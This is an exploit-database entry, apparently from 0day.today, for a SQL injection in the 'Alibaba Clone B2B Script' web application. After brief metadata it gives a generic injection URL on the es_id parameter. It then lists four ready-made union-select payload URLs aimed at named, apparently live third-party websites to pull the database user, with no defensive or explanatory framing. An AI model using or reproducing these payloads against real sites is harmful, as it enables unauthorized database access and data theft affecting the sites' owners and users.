Alibaba Clone B2B Script Sql Injection Vulnerability

2015-08-31T00:00:00
ID 1337DAY-ID-24173
Type zdt
Reporter meisamrce
Modified 2015-08-31T00:00:00

Description

Exploit Title: Alibaba Clone B2B Script Sql Injection All Versions

Date: 2015-08-31

Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com

Vendor Homepage: http://www.superbscripts.com/

Version: All Versions

Tested on: CentOS and Windows

                                        
                                            # Exploit Title: Alibaba Clone B2B Script Sql Injection All Versions
# Date: 2015-08-16
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.superbscripts.com/
# Version: All Versions
# Tested on: CentOS and Windows

Exploit :
http://site.com/contactuser.html?es_type=4&es_id=-9999+[sql+command]+%23

Test :
http://www.b2bscriptonline.com/contactuser.html?es_type=4&es_id=-617+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23
http://www.clothes.com.pk/contactuser.html?es_type=4&es_id=-617+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23
http://www.aliplatinumscript.com/contactuser.html?es_type=4&es_id=-617+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23
http://www.b2bcode.com/contactuser.html?es_type=4&es_id=-617+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23


#  0day.today [2016-04-19]  #